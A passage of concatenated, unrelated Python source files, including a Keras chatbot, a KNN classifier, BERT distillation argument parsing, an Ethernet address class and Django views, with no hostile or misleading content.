(k-1)*10 + 9,
(k-1)*10 + 8,
j-1
]))
for i in range(91, 99):
j = i%10
Sets.append(Set(index=i,bandit_list=[
Bandits[80 + j + 1],
Bandits[80 + j - 1],
Bandits[80 + j],
Bandits[i-1],
Bandits[i+1],
Bandits[i]
],adj_set=[
80 + j + 1,
80 + j - 1,
80 + j,
i-1,
i+1
]))
Sets.append(Set(index=0,bandit_list=[Bandits[1],Bandits[10],Bandits[11],Bandits[0],],adj_set=[10,11,1]))
Sets.append(Set(index=9,bandit_list=[Bandits[8],Bandits[19],Bandits[18],Bandits[9],],adj_set=[18,19,8]))
Sets.append(Set(index=90,bandit_list=[Bandits[90],Bandits[91],Bandits[80],Bandits[81],],adj_set=[81,80,91]))
Sets.append(Set(index=99,bandit_list=[Bandits[98],Bandits[99],Bandits[88],Bandits[89],],adj_set=[98,89,88]))
S = []
for i in range(100):
for j in Sets:
if j.index == i:
S.append(j)
Ban_to_Set_dict = {}
for i in range(100):
Ban_to_Set_dict[str(i)] = []
for i in range(len(Sets)):
for j in S[i].bandit_list:
Ban_to_Set_dict[str(j)].append(i)
print(Ban_to_Set_dict)
s = S[0]
for i in range(10):
print(s.index)
if s.is_ban_in(90) == False:
s = s.get_ban_set(90,S, Ban_to_Set_dict)
else:
pass
'''
|
the-stack_106_16934
|
import json
import pickle
import numpy as np
from tensorflow import keras
from tensorflow.keras.models import load_model
from config import *
model = load_model("saved/model.h5")
with open('saved/tokenizer.pickle', 'rb') as handle:
tokenizer = pickle.load(handle)
with open('saved/lbl_encoder.pickle', 'rb') as handle:
lbl_encoder = pickle.load(handle)
with open('saved/data.pickle', 'rb') as handle:
data = pickle.load(handle)
def chat():
print("Start messaging with the bot (type quit to stop)!\n")
while True:
print("User: ")
inp = input()
if inp.lower() == "quit":
break
result = model.predict(keras.preprocessing.sequence.pad_sequences(tokenizer.texts_to_sequences([inp]),
truncating='post', maxlen=max_len))
tag = lbl_encoder.inverse_transform([np.argmax(result)])
for i in data['intents']:
if i['tag'] == tag:
print("ChatBot:" + np.random.choice(i['responses']))
print("intent asked for: ", i['context_set'], "\n")
# print(Fore.GREEN + "ChatBot:" + Style.RESET_ALL,random.choice(responses))
chat()
|
the-stack_106_16935
|
#!/usr/bin/python3
import random
import sys
g = int()
h = int()
def gh_gt_0(g, h):
try:
if (g / h) > 0:
return '(A) g: {g} h: {h}, g/h > 0'.format(g=g, h=h)
else:
return False
    except ZeroDivisionError:
return print('''Can't divide by {} or {}'''.format(g, h))
def hg_dev_gt_0(h, g):
try:
if (h / g) > 0:
return '(B) h: {h} g: {g}, h/g > 0'.format(g=g, h=h)
else:
return False
    except ZeroDivisionError:
return print('''Can't divide by {} or {}'''.format(h, g))
def gh_plus_gt_0(g, h):
if (g + h) > 0:
return '(C) g: {g} h: {h}, g+h > 0'.format(g=g, h=h)
else:
return False
def gh_minus_gt_0(g, h):
if (g - h) > 0:
return '(D) g: {g} h: {h}, g-h > 0'.format(g=g, h=h)
else:
return False
def gh_plus_lt_0(g, h):
if (g + h) < 0:
return '(E) g: {g} h: {h}, g+h < 0'.format(g=g, h=h)
else:
return False
def try_everything(g, h):
if g * h > 0:
answers = []
answer = gh_gt_0(g, h)
if answer:
answers.append(answer)
answer = hg_dev_gt_0(h, g)
if answer:
answers.append(answer)
answer = gh_plus_gt_0(g, h)
if answer:
answers.append(answer)
answer = gh_minus_gt_0(g, h)
if answer:
answers.append(answer)
answer = gh_plus_lt_0(g, h)
if answer:
answers.append(answer)
if len(answers) == 4:
print('\n'.join(answers))
print()
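# Illustrative sketch (values assumed): for g = 3, h = 2 we have g*h > 0 and
# exactly four of the five statements hold (g/h > 0, h/g > 0, g+h > 0, g-h > 0,
# but not g+h < 0), so try_everything(3, 2) prints those four lines. For
# g = -3, h = -2 only the two divisions and g+h < 0 hold, so just three answers
# are collected and nothing is printed.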
if __name__ == '__main__':
results = 1000000
g_range = range(-10, 10)
h_range = range(-10, 10)
for i in range(0, results):
g = random.choice(g_range)
h = random.choice(h_range)
try_everything(g, h)
        if i % 1000 == 0 and i != 0:
print('.', end='')
sys.stdout.flush()
print('Just tried {} numbers'.format(results))
|
the-stack_106_16936
|
'''
Created on Jul 5, 2013
@author: Yubin Bai
All rights reserved.
'''
import time
from multiprocessing.pool import Pool
from heapq import *
parallelSolve = False
INF = 1 << 31
def solve(par):
    graph = {1: [2, 3, 5], 2: [1, 3, 5], 3: [1, 2, 4, 5],
             4: [3, 5], 5: [1, 2, 3, 4]}
edges = set()
for v in graph:
for v2 in graph[v]:
if v < v2:
edges.add((v, v2))
path = [1]
pathEdges = []
results = []
print(edges)
def backtrack(step):
        if step == len(edges):
            results.append(''.join(str(e) for e in path))
            return
v1 = path[-1]
for v2 in graph[v1]:
if v1 < v2 and (v1, v2) not in pathEdges:
path.append(v2)
pathEdges.append((v1, v2))
backtrack(step + 1)
path.pop()
pathEdges.pop()
if v1 > v2 and (v2, v1) not in pathEdges:
path.append(v2)
pathEdges.append((v2, v1))
backtrack(step + 1)
path.pop()
pathEdges.pop()
backtrack(0)
results.sort()
return '\n'.join(results)
class Solver:
def getInput(self):
self.numOfTests = 1
self.input = []
self.input.append([])
def __init__(self):
self.fIn = open('input.txt')
self.fOut = open('output.txt', 'w')
self.results = []
def parallel(self):
self.getInput()
p = Pool(4)
millis1 = int(round(time.time() * 1000))
self.results = p.map(solve, self.input)
millis2 = int(round(time.time() * 1000))
print("Time in milliseconds: %d " % (millis2 - millis1))
self.makeOutput()
def sequential(self):
self.getInput()
millis1 = int(round(time.time() * 1000))
for i in self.input:
self.results.append(solve(i))
millis2 = int(round(time.time() * 1000))
print("Time in milliseconds: %d " % (millis2 - millis1))
self.makeOutput()
def makeOutput(self):
for test in range(self.numOfTests):
self.fOut.write("%s\n" % self.results[test])
self.fIn.close()
self.fOut.close()
if __name__ == '__main__':
solver = Solver()
if parallelSolve:
solver.parallel()
else:
solver.sequential()
|
the-stack_106_16937
|
from django.shortcuts import render, redirect
from django.views import View
from datetime import datetime
from task_manager.models import Project
from .models import ProjectInfo, UserInfo, UserInProject
class Report(View):
def get(self, request):
if not request.user.is_authenticated:
return redirect('signIn')
user = request.user
projects = Project.objects.all()
p_info_list = []
u_info = UserInfo(user)
user_in_projects = []
for p in projects:
if p.owner == user or user.id in p.get_members():
p_info = ProjectInfo(p)
u_info.analyze_project(p)
p_info_list.append(p_info)
user_in_projects.append(UserInProject(user, p))
data = {"user": user,
"first": user.username[0],
"p_info": p_info_list,
"u_info": u_info,
"u_in_p": user_in_projects,
'time': datetime.today()
}
return render(request, 'report.html', data)
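# Illustrative wiring sketch (assumed, not part of the original app): a
# class-based view like Report is typically routed in the app's urls.py, e.g.
#
#   from django.urls import path
#   from .views import Report
#
#   urlpatterns = [path('report/', Report.as_view(), name='report')]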
|
the-stack_106_16938
|
from codecs import open
from os import path
from setuptools import setup
HERE = path.abspath(path.dirname(__file__))
# Get version info
ABOUT = {}
with open(path.join(HERE, "datadog_checks", "marathon", "__about__.py")) as f:
exec(f.read(), ABOUT)
# Get the long description from the README file
with open(path.join(HERE, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
def get_dependencies():
dep_file = path.join(HERE, 'requirements.in')
if not path.isfile(dep_file):
return []
with open(dep_file, encoding='utf-8') as f:
return f.readlines()
CHECKS_BASE_REQ = 'datadog-checks-base>=22.0.0'
setup(
name='datadog-marathon',
version=ABOUT["__version__"],
description='The Marathon check',
long_description=long_description,
long_description_content_type='text/markdown',
keywords='datadog agent marathon check',
# The project's main homepage.
url='https://github.com/DataDog/integrations-core',
# Author details
author='Datadog',
author_email='[email protected]',
# License
license='BSD',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Topic :: System :: Monitoring',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.8',
],
packages=['datadog_checks.marathon'],
install_requires=[CHECKS_BASE_REQ],
extras_require={'deps': get_dependencies()},
# Extra files to ship with the wheel package
include_package_data=True,
)
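# Illustrative note (not part of the original file): the 'deps' extra defined
# above means the dependencies from requirements.in are only pulled in when the
# package is installed with that extra, e.g. pip install "datadog-marathon[deps]".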
|
the-stack_106_16941
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
version_info = (7, 4, 2, 'final', 0)
_specifier_ = {'alpha': 'a', 'beta': 'b', 'candidate': 'rc', 'final': ''}
__version__ = '%s.%s.%s%s'%(version_info[0], version_info[1], version_info[2],
'' if version_info[3]=='final' else _specifier_[version_info[3]]+str(version_info[4]))
__protocol_version__ = '2.0.0'
__jupyter_widgets_base_version__ = '1.1.0'
__jupyter_widgets_output_version__ = '1.0.0'
__jupyter_widgets_controls_version__ = '1.4.0'
# A compatible @jupyter-widgets/html-manager npm package semver range
__html_manager_version__ = '^0.14.0'
|
the-stack_106_16942
|
import numpy as np
def distance(a: np.ndarray, b: np.ndarray) -> float:
    """[Calculate l2 norm which is Euclidean distance
    between a and b]
    Args:
        a (np.ndarray): [1st point]
        b (np.ndarray): [2nd point]
    Returns:
        float: [Distance between a and b]
    """
    return np.linalg.norm(a-b)
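# Quick sanity check of the helper above (illustrative, not part of the
# original file): distance(np.array([0, 0]), np.array([3, 4])) == 5.0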
class KNearestNeighbors(object):
def __init__(self, k: int = 5):
"""[Initialize KNN class with k]
Args:
k (int, optional): [number of nearest neighbors]. Defaults to 5.
"""
self.X, self.Y = None, None
self.classes = None
self.k = k
def fit(self, X: np.array, Y: np.array) -> None:
"""[Load data into RAM]
Args:
X (np.array): [X_train data]
Y (np.array): [Y_train features]
"""
self.X, self.Y = X, Y
def predict(self, new_X: np.array) -> np.array:
"""[Predict the class label of given points]
Args:
new_X (np.array): [X_test data]
Returns:
np.array: [Y_test features]
"""
Y_pred = np.zeros(len(new_X))
for i, new in enumerate(new_X):
dist_neighbors = []
for x, y in zip(self.X, self.Y):
eucl_d = distance(new, x)
dist_neighbors.append([eucl_d, y])
# sort ascending based on distances
dist_neighbors = sorted(dist_neighbors,
key=lambda x: x[0])[:self.k]
# extract 1st column from each row
col1 = lambda x: [x[i][1] for i, _ in enumerate(x)]
            # find the most common label (bincount needs non-negative ints)
            Y_pred[i] = np.bincount(np.array(col1(dist_neighbors), dtype=int)).argmax()
return Y_pred
def score(self, y_test: np.array, y_pred: np.array) -> float:
"""[Calculate accuracy score]
Args:
y_test (np.array): [correct labels]
y_pred (np.array): [predicted labels]
Returns:
            float: [accuracy score, 1=100%, 0=0%]
"""
return float(np.sum(y_pred == y_test))/len(y_test)
# Check if it works
import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
df = load_iris(as_frame=True).frame.values
X, y = df[:, :-1], df[:, -1]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.8,
random_state=420)
model = KNearestNeighbors(k=7)
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print(model.score(y_test, y_pred))
|
the-stack_106_16947
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import cProfile
import decimal
import os
import tempfile
from wolframclient.cli.utils import SimpleCommand
from wolframclient.language import wl
from wolframclient.serializers import export
from wolframclient.utils.debug import timed
from wolframclient.utils.encoding import force_text
from wolframclient.utils.functional import first
def repeat(el, n=1):
return tuple(el for _ in range(n))
class Command(SimpleCommand):
col_size = 8
repetitions = 10
complexity = [1, 2, 5, 10, 100, 1000]
def add_arguments(self, parser):
parser.add_argument("--profile", dest="profile", default=False, action="store_true")
def complexity_handler(self, complexity):
return {
"symbols": repeat(wl.Symbol, complexity),
"strings": repeat("string", complexity),
"bytes": repeat(b"bytes", complexity),
"integers": repeat(1, complexity),
"decimals": repeat(decimal.Decimal("1.23"), complexity),
"floats": repeat(1.23, complexity),
"dict": repeat({1: 2, 3: 4, 5: 6}, complexity),
"list": repeat([1, 2, 3], complexity),
"functions": repeat(wl.Function(1, 2, 3), complexity),
}
@timed
def export(self, *args, **opts):
return export(*args, **opts)
def formatted_time(self, *args, **opts):
time = sum(first(self.export(*args, **opts)) for i in range(self.repetitions))
return "%.5f" % (time / self.repetitions)
def table_line(self, *iterable):
self.print(*(force_text(c).ljust(self.col_size) for c in iterable))
def table_divider(self, length):
self.print(*("-" * self.col_size for i in range(length)))
def report(self):
path = tempfile.gettempdir()
benchmarks = [(c, self.complexity_handler(c)) for c in self.complexity]
self.print("dumping results in", path)
# running export to do all lazy loadings
export(1)
for title, stream_generator in (
("Memory", lambda complexity: None),
(
"File",
lambda complexity: os.path.join(
path,
"benchmark-test-%s.%s" % (force_text(complexity).zfill(7), export_format),
),
),
):
self.table_line(
title, *(force_text(c).ljust(self.col_size) for c in self.complexity)
)
self.table_divider(len(self.complexity) + 1)
for label, export_format, opts in (
("wl", "wl", dict()),
("wxf", "wxf", dict()),
("wxf zip", "wxf", dict(compress=True)),
):
self.table_line(
label,
*(
self.formatted_time(
expr,
stream=stream_generator(complexity),
target_format=export_format,
**opts
)
for complexity, expr in benchmarks
)
)
self.table_line()
self.table_line()
def handle(self, profile, **opts):
if profile:
cProfile.runctx("report()", {"report": self.report}, {})
else:
self.report()
|
the-stack_106_16948
|
import argparse
import logging
import os
import random
import torch
from envs import HOME_DATA_FOLDER, HOME_OUTPUT_FOLDER
logger = logging.getLogger(__name__)
def boolean_string(s):
if s not in {'False', 'True'}:
raise ValueError('Not a valid boolean string')
return s == 'True'
def is_folder_empty(folder_name):
if len([f for f in os.listdir(folder_name) if not f.startswith('.')]) == 0:
return True
else:
return False
def default_parser():
parser = argparse.ArgumentParser()
# Input Training tasks
parser.add_argument("--task_name",
default=None,
type=str,
help="The name of the task for training.")
# System related parameters
# parser.add_argument("--output_dir",
# default=os.path.join(HOME_DATA_FOLDER, 'outputs'),
# type=str,
# help="The output directory where the model checkpoints will be written.")
parser.add_argument("--output_dir",
default = None,
type = str,
help="The output directory where the model checkpoints will be written.")
parser.add_argument("--log_every_step",
default=1,
type=int,
help="output to log every global x training steps, default is 1")
parser.add_argument("--max_seq_length",
default=512,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
# Training related parameters
parser.add_argument('--task',
type=str,
default='MRPC',
help="The task you want to finetune the model on.")
parser.add_argument('--train_type',
type=str,
default=None,
help="train type: one of ft, kd, pkd")
parser.add_argument('--model_type',
type=str,
default='Original',
help="Model type: one of Original or SPS")
parser.add_argument('--train_seed',
type=int,
default=None,
help="random seed for training")
parser.add_argument('--saving_criterion_acc',
type=float,
default=1.0,
help="If the model's val accuracy is above this value, we save the model.")
parser.add_argument('--saving_criterion_loss',
type=float,
default=0.0,
help="If the model's val loss is lower than this value, we save the model.")
parser.add_argument('--load_model_dir',
type =str,
default = None,
help="Load model")
parser.add_argument('--save_model_dir',
type = str,
default = None,
help="Specify the directory where to save the final model")
parser.add_argument('--seed',
type=int,
default=None,
help="random seed for initialization")
parser.add_argument("--train_batch_size",
default=None,
type=int,
help="Total batch size for training.")
parser.add_argument("--eval_batch_size",
default=None,
type=int,
help="Total batch size for eval.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_epochs",
default=4.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument('--fp16',
type=boolean_string,
default=False,
help="Whether to use 16-bit float precision instead of 32-bit")
parser.add_argument('--loss_scale',
type=float, default=0,
help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
"0 (default value): dynamic loss scaling.\n"
"Positive power of 2: static loss scaling value.\n")
parser.add_argument('--student_hidden_layers',
type=int,
default=None,
help="number of transformer layers for student, default is None (use all layers)")
parser.add_argument('--teacher_prediction',
type=str,
default=None,
help="teacher prediction file to guild the student's output")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
# Distillation related parameters
parser.add_argument("--bert_model",
default=None,
type=str,
help="student bert model configuration folder")
parser.add_argument("--encoder_checkpoint",
default=None,
type=str,
help="check point for student encoder")
parser.add_argument("--cls_checkpoint",
default=None,
type=str,
help="check point for student classifier")
parser.add_argument("--output_all_encoded_layers",
default=False,
type=bool,
help="if output all encoded layers")
parser.add_argument("--alpha",
default=0.95,
type=float,
help="alpha for distillation")
parser.add_argument("--T",
default=10.,
type=float,
help="temperature for distillation")
parser.add_argument("--beta",
default=0.0,
type=float,
help="weight for AT loss")
parser.add_argument("--kd_model",
default="kd",
type=str,
help="KD model architecture, either kd, kd.full or kd.cls")
parser.add_argument("--fc_layer_idx",
default=None,
type=str,
help="layers ids we will put FC layers on, only avaiable when kd_model is kd.full")
parser.add_argument("--weights",
default=None,
type=str,
help="weight of each layer that we will put FC layers on, only available when kd_model is kd.full")
parser.add_argument("--normalize_patience",
default=False,
type=boolean_string,
help="normalize patience or not")
# Distillation related parameters
parser.add_argument("--do_train",
default=False,
type=boolean_string,
help="do training or not")
parser.add_argument("--do_eval",
default=False,
type=boolean_string,
help="do evaluation during training or not")
return parser
def complete_argument(args, out_dir, load_dir = None):
MODEL_FOLDER = os.path.join(HOME_DATA_FOLDER, 'models')
if args.student_hidden_layers in [None, 'None']:
args.student_hidden_layers = 12 if 'base' in args.bert_model else 24
args.bert_model = os.path.join(MODEL_FOLDER, 'pretrained', args.bert_model)
# if args.encoder_checkpoint not in [None, 'None']:
# args.encoder_checkpoint = os.path.join(MODEL_FOLDER, args.encoder_checkpoint)
# else:
# args.encoder_checkpoint = os.path.join(MODEL_FOLDER, 'pretrained', args.bert_model, 'pytorch_model.bin')
# #logger.info('encoder checkpoint not provided, use pre-trained at %s instead' % args.encoder_checkpoint)
if args.encoder_checkpoint is None:
args.encoder_checkpoint = os.path.join(MODEL_FOLDER, 'pretrained', args.bert_model, 'pytorch_model.bin')
logger.info('encoder checkpoint not provided, use pre-trained at %s instead' % args.encoder_checkpoint)
if args.cls_checkpoint not in [None, 'None']:
args.cls_checkpoint = os.path.join(MODEL_FOLDER, args.cls_checkpoint)
# if args.kd_model == 'kd.cls':
# output_name = args.kd_model + '.' + str(args.normalize_patience) + '_' + args.task_name + '_nlayer.' + str(args.student_hidden_layers)
# else:
# output_name = args.kd_model + '_' + args.task_name + '_nlayer.' + str(args.student_hidden_layers)
# output_name += '_lr.' + str(args.learning_rate) + '_T.' + str(args.T) + '_alpha.' + str(args.alpha)
# output_name += '_beta.' + str(args.beta) + '_bs.' + str(args.train_batch_size)
if out_dir is None:
raise ValueError("Must specify the output directory where the results will be written and saved")
else:
args.output_dir = os.path.join(HOME_OUTPUT_FOLDER, args.task_name)
args.output_dir = os.path.join(args.output_dir, out_dir)
# run = 1
# while os.path.exists(args.output_dir + '-run-' + str(run)):
# if is_folder_empty(args.output_dir + '-run-' + str(run)):
# #logger.info('folder exist but empty, use it as output')
# break
# #logger.info(args.output_dir + '-run-' + str(run) + ' exist, trying next')
# run += 1
# args.output_dir += '-run-' + str(run)
os.makedirs(args.output_dir, exist_ok=True)
if load_dir is not None:
args.load_model_dir = os.path.join(HOME_OUTPUT_FOLDER, args.task_name)
args.load_model_dir = os.path.join(args.load_model_dir, load_dir)
if args.task_name == 'MNLI':
args.output_dir_mm = args.output_dir.replace('MNLI', 'MNLI-mm', 100)
os.makedirs(args.output_dir_mm, exist_ok=True)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
n_gpu = torch.cuda.device_count()
args.device = device
args.n_gpu = n_gpu
logger.info("device: {} n_gpu: {}, 16-bits training: {}".format(device, n_gpu, args.fp16))
if args.train_seed is None:
args.train_seed = random.randint(0, 100000000)
#args.seed = 50447861
#logger.info('random train seed = %d' % args.train_seed)
return args
def get_predefine_argv(args, mode='glue', task_name='RTE', train_type='kd', student_layers = 3):
"""
    the function returns some pre-defined arguments for the argument parser
    :param mode: can only be 'glue' for now
    :param task_name: one of the task names under glue
    :param train_type: one of 'ft', 'finetune_student', 'kd' or 'pkd'
:return:
"""
if mode == 'race':
raise NotImplementedError('Please run glue for now')
elif mode == 'glue':
argv = [
'--task_name', task_name,
'--bert_model', 'bert-base-uncased',
'--max_seq_length', '128',
'--train_batch_size', '64',
'--learning_rate', '2e-5',
'--num_train_epochs', '6',
'--eval_batch_size', '32',
'--gradient_accumulation_steps', '1',
'--log_every_step', '1',
'--do_train', 'True',
'--do_eval', 'True',
'--fp16', 'False',
]
if train_type == 'ft':
argv += [
'--student_hidden_layers', str(student_layers),
'--train_batch_size', '64',
'--kd_model', 'kd',
'--alpha', '0.0', # alpha = 0 is equivalent to fine-tuning for KD
]
if train_type == 'finetune_student':
argv += [
'--student_hidden_layers', str(student_layers),
'--kd_model', 'kd',
'--alpha', '0.0',
]
elif train_type == 'kd':
teacher_pred = HOME_OUTPUT_FOLDER+f'/{task_name}/{task_name}_patient_kd_teacher_12layer_result_summary.pkl'
argv += [
'--student_hidden_layers', str(student_layers),
'--kd_model', 'kd',
'--alpha', '0.7',
'--T', '10',
'--teacher_prediction', teacher_pred,
]
elif train_type == 'pkd':
teacher_pred = HOME_OUTPUT_FOLDER+f'/{task_name}/{task_name}_patient_kd_teacher_12layer_result_summary.pkl'
argv += [
'--student_hidden_layers', str(student_layers),
'--kd_model', 'kd.cls',
'--alpha', '0.7',
'--beta', '100',
'--T', '10',
'--teacher_prediction',
teacher_pred,
'--fc_layer_idx', '1,3,5,7,9', # this for pkd-skip
'--normalize_patience', 'True',
]
else:
raise NotImplementedError('training mode %s has not been implemented yet' % mode)
return argv
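# Illustrative sketch of how these helpers are meant to be combined (the task,
# layer count and output directory below are assumptions, not taken from this
# module):
#
#   parser = default_parser()
#   argv = get_predefine_argv(None, mode='glue', task_name='RTE',
#                             train_type='pkd', student_layers=6)
#   args = parser.parse_args(argv)
#   args = complete_argument(args, out_dir='rte_pkd_run')
#
# after which args.output_dir points under HOME_OUTPUT_FOLDER/RTE/rte_pkd_run
# and training code can consume the populated namespace.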
|
the-stack_106_16949
|
import _plotly_utils.basevalidators
class RangeValidator(_plotly_utils.basevalidators.InfoArrayValidator):
def __init__(
self, plotly_name='range', parent_name='layout.scene.yaxis', **kwargs
):
super(RangeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
anim=kwargs.pop('anim', False),
edit_type=kwargs.pop('edit_type', 'plot'),
implied_edits=kwargs.pop('implied_edits', {'autorange': False}),
items=kwargs.pop(
'items', [
{
'valType': 'any',
'editType': 'plot',
'impliedEdits': {
'^autorange': False
}
},
{
'valType': 'any',
'editType': 'plot',
'impliedEdits': {
'^autorange': False
}
}
]
),
role=kwargs.pop('role', 'info'),
**kwargs
)
|
the-stack_106_16950
|
#!/usr/bin/env python3
#
# Copyright (c) 2016 Roberto Riggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""EmPOWER EtherAddress Class."""
class EtherAddress:
"""An Ethernet (MAC) address type."""
def __init__(self, addr="00:00:00:00:00:00"):
"""
        Understands Ethernet addresses in various forms: hex strings, raw byte
        strings, etc.
"""
        # Always stored as a 6-byte bytes object
if isinstance(addr, bytes) and len(addr) == 6:
# raw
self._value = addr
elif isinstance(addr, str):
if len(addr) == 17 or addr.count(':') == 5:
# hex
if len(addr) == 17:
if addr[2::3] != ':::::' and addr[2::3] != '-----':
raise RuntimeError("Bad format for ethernet address")
# Address of form xx:xx:xx:xx:xx:xx
# Pick out the hex digits only
addr = ''.join(
(addr[x * 3:x * 3 + 2] for x in range(0, 6)))
else:
# Assume it's hex digits but they may not all be in
# two-digit groupings (e.g., xx:x:x:xx:x:x). This actually
# comes up.
addr = ''.join(["%02x" % (int(x, 16),)
for x in addr.split(":")])
# We should now have 12 hex digits (xxxxxxxxxxxx).
# Convert to 6 raw bytes.
addr = b''.join(bytes((int(addr[x * 2:x * 2 + 2], 16),))
for x in range(0, 6))
else:
raise ValueError("Expected 6 raw bytes or some hex")
self._value = addr
elif isinstance(addr, EtherAddress):
self._value = addr.to_raw()
elif addr is None:
self._value = b'\x00' * 6
else:
raise ValueError("EtherAddress must be a string of 6 raw bytes")
def is_global(self):
"""
Returns True if this is a globally unique (OUI enforced) address.
"""
return not self.is_local()
def is_local(self):
"""
Returns True if this is a locally-administered (non-global) address.
"""
return True if (self._value[0] & 2) else False
def is_multicast(self):
"""
Returns True if this is a multicast address.
"""
return True if (self._value[0] & 1) else False
def to_raw(self):
"""
Returns the address as a 6-long bytes object.
"""
return self._value
def to_tuple(self):
"""
Returns a 6-entry long tuple where each entry is the numeric value
of the corresponding byte of the address.
"""
return tuple((x for x in self._value))
def to_str(self, separator=':'):
"""
Returns the address as string consisting of 12 hex chars separated
by separator.
"""
return separator.join(('%02x' % (x,) for x in self._value)).upper()
def to_int(self, separator=':'):
"""
        Returns the address as an integer, parsed from its hex representation
        with the separator removed.
"""
return int(self.to_str().replace(separator, ""), 16)
def match(self, other):
""" Bitwise match. """
if isinstance(other, EtherAddress):
other = other.to_raw()
elif isinstance(other, bytes):
pass
else:
try:
other = EtherAddress(other).to_raw()
except RuntimeError:
return False
for cnt in range(0, 6):
if (self._value[cnt] & other[cnt]) != self._value[cnt]:
return False
return True
def __str__(self):
return self.to_str()
def __eq__(self, other):
if isinstance(other, EtherAddress):
other = other.to_raw()
elif isinstance(other, bytes):
pass
else:
try:
other = EtherAddress(other).to_raw()
except RuntimeError:
return False
if self._value == other:
return True
return False
def __hash__(self):
return self._value.__hash__()
def __repr__(self):
return self.__class__.__name__ + "('" + self.to_str() + "')"
def __setattr__(self, a, v):
if hasattr(self, '_value'):
raise TypeError("This object is immutable")
object.__setattr__(self, a, v)
@classmethod
def bcast(cls):
""" Return a broadcast address. """
return EtherAddress('ff:ff:ff:ff:ff:ff')
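# Illustrative usage sketch, not part of the original module: exercises the
# parsing, formatting and query helpers above; the sample address is assumed.
if __name__ == "__main__":
    addr = EtherAddress("aa:bb:cc:dd:ee:ff")
    assert addr.to_str() == "AA:BB:CC:DD:EE:FF"
    assert addr.to_tuple() == (0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF)
    assert addr == EtherAddress(addr.to_raw())
    assert EtherAddress.bcast().is_multicast()
    print(repr(addr), "local:", addr.is_local(), "multicast:", addr.is_multicast())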
|
the-stack_106_16952
|
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Writes OpenFst SymbolTable for unified Indic graphemes.
"""
from __future__ import unicode_literals
import sys
from mul_034 import script_util
def main(argv):
if len(argv) == 1:
display_file = 'display_grapheme.syms'
grapheme_file = 'grapheme.syms'
elif len(argv) == 3:
display_file = argv[1]
grapheme_file = argv[2]
else:
sys.stderr.write(
'Usage: make_grapheme_syms [display_grapheme.syms grapheme.syms]\n')
sys.exit(2)
data = list(script_util.ReadGraphemeDataDefault())
display_graphemes = [(display, label) for (display, _, _, label) in data]
graphemes = [(grapheme, label) for (_, grapheme, _, label) in data]
success = script_util.IsBijectiveMapping(display_graphemes)
success &= script_util.IsBijectiveMapping(graphemes)
if not success:
sys.exit(1)
script_util.SymbolsToFile(display_file, display_graphemes)
script_util.SymbolsToFile(grapheme_file, graphemes)
return
if __name__ == '__main__':
main(sys.argv)
|
the-stack_106_16954
|
from rest_framework import viewsets
from .models import ListModel
from . import serializers
from utils.page import MyPageNumberPagination
from rest_framework.filters import OrderingFilter
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.response import Response
from .filter import Filter
from rest_framework.exceptions import APIException
class APIViewSet(viewsets.ModelViewSet):
"""
retrieve:
Response a data list(get)
list:
Response a data list(all)
create:
Create a data line(post)
delete:
Delete a data line(delete)
partial_update:
Partial_update a data(patch:partial_update)
update:
Update a data(put:update)
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = Filter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return ListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return ListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return ListModel.objects.none()
def get_serializer_class(self):
if self.action in ['list', 'retrieve', 'destroy']:
return serializers.WarehouseGetSerializer
elif self.action in ['create']:
return serializers.WarehousePostSerializer
elif self.action in ['update']:
return serializers.WarehouseUpdateSerializer
elif self.action in ['partial_update']:
return serializers.WarehousePartialUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, *args, **kwargs):
data = self.request.data
data['openid'] = self.request.auth.openid
if ListModel.objects.filter(openid=data['openid'], warehouse_name=data['warehouse_name'], is_delete=False).exists():
raise APIException({"detail": "Data Exists"})
else:
if ListModel.objects.filter(openid=data['openid'], is_delete=False).count() >= 1:
